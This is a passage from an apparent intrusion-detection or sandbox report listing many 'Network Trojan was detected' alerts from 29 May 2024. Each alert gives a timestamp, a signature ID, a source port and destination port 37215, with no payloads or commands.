                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962769
                SID:2835222
                Source Port:58004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987334
                SID:2835222
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912939
                SID:2829579
                Source Port:43382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273917
                SID:2835222
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558650
                SID:2829579
                Source Port:44754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333756
                SID:2835222
                Source Port:52242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168701
                SID:2829579
                Source Port:39320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133994
                SID:2829579
                Source Port:54442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038094
                SID:2835222
                Source Port:53822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611448
                SID:2829579
                Source Port:41912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732806
                SID:2835222
                Source Port:57902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975902
                SID:2829579
                Source Port:57016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339092
                SID:2829579
                Source Port:46242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818165
                SID:2829579
                Source Port:34222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364732
                SID:2829579
                Source Port:60682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782191
                SID:2835222
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385432
                SID:2829579
                Source Port:44576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848245
                SID:2829579
                Source Port:42730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441547
                SID:2829579
                Source Port:42914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508642
                SID:2829579
                Source Port:33508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715254
                SID:2835222
                Source Port:56540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.581215
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965472
                SID:2829579
                Source Port:50714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231224
                SID:2835222
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519498
                SID:2829579
                Source Port:53978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742190
                SID:2829579
                Source Port:60712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781326
                SID:2829579
                Source Port:50074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844186
                SID:2835222
                Source Port:45798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321627
                SID:2835222
                Source Port:47746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975842
                SID:2835222
                Source Port:60134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655264
                SID:2829579
                Source Port:57518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942850
                SID:2835222
                Source Port:60820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931579
                SID:2829579
                Source Port:36098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785442
                SID:2835222
                Source Port:42794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498920
                SID:2829579
                Source Port:55378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948780
                SID:2829579
                Source Port:60378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654143
                SID:2829579
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032706
                SID:2835222
                Source Port:37018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265940
                SID:2829579
                Source Port:49634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.970025
                SID:2829579
                Source Port:59056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983742
                SID:2835222
                Source Port:45978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974374
                SID:2829579
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801209
                SID:2835222
                Source Port:33692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913679
                SID:2829579
                Source Port:58372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785884
                SID:2835222
                Source Port:40846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910792
                SID:2829579
                Source Port:47342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321894
                SID:2835222
                Source Port:37626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418753
                SID:2829579
                Source Port:53888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444298
                SID:2829579
                Source Port:56904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629912
                SID:2835222
                Source Port:36666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014586
                SID:2835222
                Source Port:47974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320155
                SID:2835222
                Source Port:47312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908087
                SID:2835222
                Source Port:58726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008676
                SID:2829579
                Source Port:39910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559099
                SID:2835222
                Source Port:36670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374556
                SID:2835222
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009719
                SID:2835222
                Source Port:52142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790715
                SID:2829579
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108923
                SID:2835222
                Source Port:59060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387135
                SID:2835222
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432658
                SID:2829579
                Source Port:45346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139925
                SID:2835222
                Source Port:46860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870564
                SID:2835222
                Source Port:49474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945858
                SID:2829579
                Source Port:45220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968400
                SID:2835222
                Source Port:37482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620285
                SID:2835222
                Source Port:58434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858047
                SID:2835222
                Source Port:55522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797738
                SID:2835222
                Source Port:44456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630016
                SID:2835222
                Source Port:53492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862195
                SID:2829579
                Source Port:52936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.018764
                SID:2835222
                Source Port:55148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264928
                SID:2835222
                Source Port:47292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933176
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732775
                SID:2835222
                Source Port:44264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135998
                SID:2835222
                Source Port:43748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631649
                SID:2829579
                Source Port:57838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784781
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325662
                SID:2835222
                Source Port:48332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712044
                SID:2835222
                Source Port:35378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963116
                SID:2835222
                Source Port:49986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508304
                SID:2829579
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962749
                SID:2829579
                Source Port:54848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779863
                SID:2829579
                Source Port:35900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073833
                SID:2829579
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419161
                SID:2835222
                Source Port:36216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655898
                SID:2835222
                Source Port:52964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223970
                SID:2829579
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912998
                SID:2829579
                Source Port:40864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583097
                SID:2835222
                Source Port:56088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227975
                SID:2829579
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659561
                SID:2829579
                Source Port:46634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934135
                SID:2829579
                Source Port:32982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087361
                SID:2835222
                Source Port:48222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339271
                SID:2829579
                Source Port:52430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387236
                SID:2829579
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714135
                SID:2829579
                Source Port:45528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212208
                SID:2835222
                Source Port:43768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175089
                SID:2829579
                Source Port:59790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562852
                SID:2829579
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609964
                SID:2829579
                Source Port:35864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617778
                SID:2829579
                Source Port:51396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587462
                SID:2829579
                Source Port:49980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321725
                SID:2829579
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517254
                SID:2835222
                Source Port:54630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870243
                SID:2835222
                Source Port:40306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574061
                SID:2829579
                Source Port:56034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593739
                SID:2829579
                Source Port:54704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417846
                SID:2835222
                Source Port:56366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765245
                SID:2835222
                Source Port:38934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895722
                SID:2829579
                Source Port:34456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420929
                SID:2829579
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815534
                SID:2835222
                Source Port:59790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474790
                SID:2835222
                Source Port:45348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066713
                SID:2835222
                Source Port:60436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372219
                SID:2829579
                Source Port:57992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629793
                SID:2829579
                Source Port:52876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870492
                SID:2829579
                Source Port:38696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.021677
                SID:2829579
                Source Port:49404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277593
                SID:2835222
                Source Port:48750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836436
                SID:2829579
                Source Port:45400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886294
                SID:2835222
                Source Port:53620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228333
                SID:2835222
                Source Port:51440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630050
                SID:2835222
                Source Port:59320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091367
                SID:2829579
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567510
                SID:2835222
                Source Port:56472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868305
                SID:2835222
                Source Port:55468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277537
                SID:2829579
                Source Port:49148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968222
                SID:2829579
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319933
                SID:2829579
                Source Port:38108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718459
                SID:2829579
                Source Port:51396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373901
                SID:2829579
                Source Port:35736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572236
                SID:2829579
                Source Port:36802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545858
                SID:2829579
                Source Port:45410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899306
                SID:2829579
                Source Port:47592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513194
                SID:2835222
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165925
                SID:2829579
                Source Port:55018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315811
                SID:2835222
                Source Port:58740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567151
                SID:2829579
                Source Port:46102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826193
                SID:2835222
                Source Port:36574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613168
                SID:2829579
                Source Port:53776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165519
                SID:2829579
                Source Port:60834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655131
                SID:2835222
                Source Port:60454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915891
                SID:2835222
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728655
                SID:2835222
                Source Port:35708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532291
                SID:2835222
                Source Port:38268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.715621
                SID:2835222
                Source Port:54448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265855
                SID:2829579
                Source Port:48716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207355
                SID:2829579
                Source Port:41214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740199
                SID:2835222
                Source Port:50146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958012
                SID:2835222
                Source Port:49164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176892
                SID:2835222
                Source Port:58968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782244
                SID:2835222
                Source Port:46046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168661
                SID:2835222
                Source Port:46376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022159
                SID:2835222
                Source Port:51646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573321
                SID:2829579
                Source Port:37598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897358
                SID:2829579
                Source Port:48144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727237
                SID:2835222
                Source Port:55766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631576
                SID:2835222
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281964
                SID:2829579
                Source Port:57348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852438
                SID:2829579
                Source Port:47720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902817
                SID:2835222
                Source Port:35560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520995
                SID:2835222
                Source Port:52486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011045
                SID:2835222
                Source Port:46214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014965
                SID:2829579
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444474
                SID:2829579
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.040047
                SID:2829579
                Source Port:34832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179688
                SID:2835222
                Source Port:38472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556828
                SID:2829579
                Source Port:34572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652861
                SID:2835222
                Source Port:44238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166338
                SID:2835222
                Source Port:47042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218207
                SID:2835222
                Source Port:53370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807611
                SID:2835222
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860735
                SID:2829579
                Source Port:60950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398703
                SID:2835222
                Source Port:43232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.939192
                SID:2835222
                Source Port:60652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899285
                SID:2829579
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832607
                SID:2835222
                Source Port:38892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040722
                SID:2835222
                Source Port:33110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882766
                SID:2835222
                Source Port:33614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463208
                SID:2835222
                Source Port:56214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225714
                SID:2835222
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358792
                SID:2835222
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438521
                SID:2835222
                Source Port:35032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282019
                SID:2829579
                Source Port:57106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919937
                SID:2829579
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716379
                SID:2829579
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375213
                SID:2835222
                Source Port:35228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008809
                SID:2829579
                Source Port:49652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785706
                SID:2835222
                Source Port:55670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223742
                SID:2829579
                Source Port:46690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983900
                SID:2835222
                Source Port:52762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572852
                SID:2835222
                Source Port:54134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867821
                SID:2835222
                Source Port:52328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267742
                SID:2829579
                Source Port:33602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652008
                SID:2835222
                Source Port:51864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437614
                SID:2829579
                Source Port:40420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948542
                SID:2835222
                Source Port:60536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
